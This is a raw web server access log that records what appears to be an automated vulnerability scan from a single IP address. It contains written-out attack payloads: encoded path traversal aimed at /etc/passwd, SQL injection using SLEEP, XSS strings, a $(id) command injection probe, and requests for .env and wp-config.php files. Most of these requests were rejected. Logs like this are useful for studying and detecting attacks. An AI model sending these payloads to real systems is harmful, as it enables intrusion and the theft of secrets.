195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:04 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /static/..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /static/..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:05 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1 404 1165
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1224
195.164.49.69 - - [20/Oct/2024:19:14:06 +0000] GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:14:07 +0000] GET /..///////..////..//////etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:27 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /index.php?page=etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /index.php?page=etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /index.php?page=../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /index.php?page=....//....//etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:14:28 +0000] GET /../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:14:49 +0000] GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:14:51 +0000] POST /restrito/login/sub/ HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:14:53 +0000] GET /restrito/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:14:55 +0000] GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:15:17 +0000] POST /v1/app/writeFileSync HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:15:19 +0000] POST /v1/app/readFileSync HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:15:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:15:23 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:19:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
- - - [20/Oct/2024:19:15:57 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:15:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:16:00 +0000] GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:16:04 +0000] GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:16:25 +0000] POST /module/retrieve_pwd/header.inc.php HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:19:16:29 +0000] GET /general/login_code.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:16:35 +0000] GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:19:16:36 +0000] GET /wp-content/plugins/slideshow-jquery-image-gallery/readme.txt HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:19:16:39 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
83.212.98.101 - - [20/Oct/2024:19:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:17:41 +0000] GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:18:02 +0000] GET /info/dir?/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:18:04 +0000] GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 404 1184
195.164.49.69 - - [20/Oct/2024:19:18:06 +0000] GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:18:08 +0000] GET /applications.pinpoint HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:18:09 +0000] GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:18:12 +0000] GET /var/resource_config.json HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:18:14 +0000] GET /installer/installerUI.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:18:17 +0000] GET /home HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:18:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:18:21 +0000] GET /jenkins/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:18:23 +0000] GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:18:25 +0000] GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:18:27 +0000] GET /debug/pprof/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:18:29 +0000] GET /debug/pprof/goroutine?debug=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:18:31 +0000] GET /api/Image/withpath/C:%5CWindows%5Cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:18:33 +0000] GET /__clockwork/latest HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:18:35 +0000] GET /index.php/install/ HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:18:37 +0000] GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1 404 1209
195.164.49.69 - - [20/Oct/2024:19:18:39 +0000] GET /installer/install.php HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:18:41 +0000] GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:19:02 +0000] GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:19:04 +0000] GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:19:46 +0000] GET /v1/cs/configs?export=true&group&tenant&appName&ids&dataId HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:19:49 +0000] GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 404 1215
195.164.49.69 - - [20/Oct/2024:19:20:11 +0000] GET /anything_here HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:20:13 +0000] GET /user/sign_up HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:20:15 +0000] GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:20:17 +0000] GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1082
83.212.98.101 - - [20/Oct/2024:19:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:20:58 +0000] GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:21:19 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:21:41 +0000] GET /jkstatus HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:21:43 +0000] GET /jkstatus; HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:22:05 +0000] GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:22:26 +0000] GET /git/notifyCommit?url=2niLWqCw0Zs21SbKaQXTIDeLjFc&branches=2niLWqCw0Zs21SbKaQXTIDeLjFc HTTP/1.1 404 1094
83.212.98.101 - - [20/Oct/2024:19:22:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:22:29 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/M5l2.css HTTP/1.1 404 1178
195.164.49.69 - - [20/Oct/2024:19:22:30 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/dwDY.css HTTP/1.1 404 1191
195.164.49.69 - - [20/Oct/2024:19:23:11 +0000] GET /i/?a=logs HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:23:13 +0000] GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1140
195.164.49.69 - - [20/Oct/2024:19:23:15 +0000] GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:19:23:17 +0000] GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:23:39 +0000] GET /index.php?download=/etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:24:01 +0000] GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:24:23 +0000] GET /upgrade.php HTTP/1.1 404 1085
- - - [20/Oct/2024:19:24:25 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:24:26 +0000] GET /wp-admin/setup-config.php?step=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:24:29 +0000] GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:24:50 +0000] GET /device/config HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:24:52 +0000] GET /_profiler/empty/search/results?limit=10 HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:19:24:54 +0000] GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:19:24:56 +0000] GET /index.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:19:24:58 +0000] GET /index_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:19:25:00 +0000] GET /dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:19:25:02 +0000] GET /debug.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:19:25:04 +0000] GET /_debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:19:25:06 +0000] GET /web/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:19:25:08 +0000] GET /public/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:19:25:10 +0000] GET /frontend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:19:25:12 +0000] GET /backend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:19:25:14 +0000] GET /api_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:19:25:16 +0000] GET /app.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:19:25:18 +0000] GET /app_test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:19:25:20 +0000] GET /test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:19:25:22 +0000] GET /symfony/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:19:25:24 +0000] GET /debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:19:25:26 +0000] GET /dev/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:19:25:28 +0000] GET /profiler/empty/search/results?limit=10 HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:25:30 +0000] GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:25:32 +0000] GET /msa/../../../../../../../../etc/passwd HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:19:25:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:26:13 +0000] GET /admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:26:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:26:36 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:26:39 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:26:42 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:26:44 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:26:46 +0000] GET /../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:27:07 +0000] GET /command/prima-factory.cgi HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:27:10 +0000] GET /%5C../ssl/yaws-key.pem HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:19:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:27:31 +0000] GET /admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:27:53 +0000] GET /chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:19:28:15 +0000] GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:28:36 +0000] GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:28:38 +0000] GET /portal/conf/config.properties HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:28:40 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:28:42 +0000] GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml HTTP/1.1 404 1200
195.164.49.69 - - [20/Oct/2024:19:28:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:28:45 +0000] GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:19:28:47 +0000] GET /openam/ui/PWResetUserValidation HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:28:49 +0000] GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:19:28:51 +0000] GET /ui/PWResetUserValidation HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:28:53 +0000] GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:28:55 +0000] GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:28:57 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:28:58 +0000] GET /_vti_pvt/service.pwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:29:00 +0000] GET /?aam-media=wp-config.php HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:29:02 +0000] GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:29:03 +0000] GET /login.do?message=982910*994400 HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:29:05 +0000] GET /login/login.do?message=982910*994400 HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:29:07 +0000] GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:29:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:29:11 +0000] GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:29:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:29:17 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:29:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:29:21 +0000] GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:29:26 +0000] POST /api/external/7.0/system.System.get_infos HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:19:29:58 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:19:30:00 +0000] GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:30:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:30:19 +0000] GET /api/blade-user/user-list HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:30:21 +0000] GET /api/blade-user/user-list HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:30:21 +0000] GET /api/blade-user/user-list HTTP/1.1 404 1106
83.212.98.101 - - [20/Oct/2024:19:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:31:02 +0000] POST /ubus/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:31:23 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:31:29 +0000] POST /goform/aspForm HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:31:31 +0000] GET /avwjkka HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:31:35 +0000] GET /chaosblade?cmd=$(id) HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:31:37 +0000] GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:19:31:39 +0000] GET /mailinspector/login.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:31:40 +0000] POST /openam/json/realms/root/authenticate HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:19:31:43 +0000] POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:19:31:45 +0000] GET /common/fghgg.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:31:47 +0000] PUT /api/v2/simulation HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:19:32:09 +0000] POST /device/description_en.html HTTP/1.1 404 1104
83.212.98.101 - - [20/Oct/2024:19:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:32:31 +0000] POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:32:52 +0000] GET /api/v1/apikey?/api/v1/ping HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:32:54 +0000] GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:33:16 +0000] POST /api/account/auth/form HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:33:18 +0000] POST /client/api/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:33:19 +0000] POST /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:33:22 +0000] POST /bonita/loginservice?redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:33:24 +0000] GET /index.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:33:26 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:33:28 +0000] POST /index.php/verifyLogin/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:19:33:30 +0000] POST /api/v4/auth HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:33:32 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:33:36 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:33:38 +0000] POST /htdocs/login/login.lua HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:33:39 +0000] POST /content.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:33:42 +0000] GET /control/userimage.html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:33:44 +0000] GET /control/userimage.html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:33:46 +0000] POST /login.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:33:48 +0000] POST /seeyon/management/index.jsp HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:19:33:52 +0000] GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:19:33:52 +0000] GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:19:33:54 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:33:56 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:34:29 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:34:30 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:34:30 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:34:30 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:34:30 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:34:30 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:34:31 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:34:31 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:34:31 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:34:31 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:34:31 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.www HTTP/1.1 404 1082
